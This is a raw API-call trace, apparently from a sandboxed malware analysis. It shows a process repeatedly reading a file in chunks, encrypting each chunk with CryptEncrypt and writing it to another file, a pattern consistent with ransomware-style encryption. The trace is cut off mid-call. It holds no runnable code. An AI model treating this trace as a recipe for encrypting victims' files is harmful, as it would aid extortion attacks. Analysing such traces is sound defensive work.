[0265.745] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.745] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.745] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.745] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.745] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.746] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.746] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.746] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.746] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.746] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.746] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.747] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.747] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.747] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.747] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.747] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.747] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.748] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.748] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.748] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.748] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.748] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.748] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.749] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.749] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.749] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.750] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.750] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.751] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.751] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.751] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.751] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.751] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.751] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.752] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.752] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 